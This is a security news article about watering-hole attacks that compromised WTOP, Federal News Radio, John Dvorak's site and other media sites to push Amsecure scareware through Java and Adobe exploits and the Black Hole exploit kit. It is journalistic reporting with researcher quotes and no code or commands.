Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software.
Popular D.C. radio station WTOP, sister station Federal News Radio, and the site of technology blogger John Dvorak, were infected with exploits targeting third-party Java or Adobe browser plug-ins. The exploits redirect site visitors to an exploit kit serving a scareware executable known as Amsecure.
As of Tuesday morning, WTOP was still serving malware. The source of the attacks on WTOP and Federal News Radio has not been determined, and it still could be that these are a jumping off point for a larger attack against Federal employees who frequent those sites as a D.C. news source. Media sites have been targeted with more frequency in recent months, and on a variety of levels. But for now, experts are not calling these targeted attacks.
“Typically with ‘watering hole’ style attacks, the threat actors are targeting a very specific group of users or organizations in order to implant malware (remote access Trojan) that allows for access to the victim’s network (as we saw with the recent DoL compromise),” said Invincea in a statement provided to Threatpost. “In the case of these three sites which are obviously visited by a much larger audience and based on the type of malware observed (crimeware vs. RAT) our assumption is that a specific user group is more than likely not being targeted. Theft of online credentials and/or loss of additional PII is the likely goal of the attacker in these cases.”
Zscaler, meanwhile, said the three attacks shared another commonality: the attack sites were hosted at dynamic DNS providers and the attacks are triggered only when it detects the user is visiting via Internet Explorer. Zscaler also identified three media other sites as compromised: The Christian Post, Real Clear Science and Real Clear Policy.
The Dvorak site, meanwhile, may be offering up more clues on the attack than the other two. Invincea said it visited the site using Internet Explorer with Java and Adobe Reader and Flash plug-ins loaded into the browser and was immediately attacked. An admin for the Dvorak site posted a note that malware had been discovered in the site’s wp-config.php file, which is the main configuration file for the WordPress content management system.
“Given the amount of attention WordPress has received both recently and historically by miscreants seeking to hijack legitimate websites in order to drive user traffic to malware landing pages, this came as no surprise to us,” Invincea security engineer Eddie Mitchell said.
Upon landing on the Dvorak site, IE pulls a Java application from the attacker’s site and connects to one of two malicious domains, registered to a Russian domain. The Amsecure malware is downloaded and a desktop shortcut is installed, called Internet Security 2013[.]ink.
Amsecure is part of the Kazy malware family. Previous variants of the malware take over the desktop and display a warning screen indicating the computer has been infected along with a phony scanner tool that the attacker hopes will scare the user into buying the fake antivirus program.
Invincea was also able to discover three exploits on the Dvorak landing page for Java and Adobe Reader: CVE-2013-0422; CVE-2009-0927; and CVE-2010-0188. These exploits lead to landing page hosting the Black Hole exploit kit and the amsecure attacks.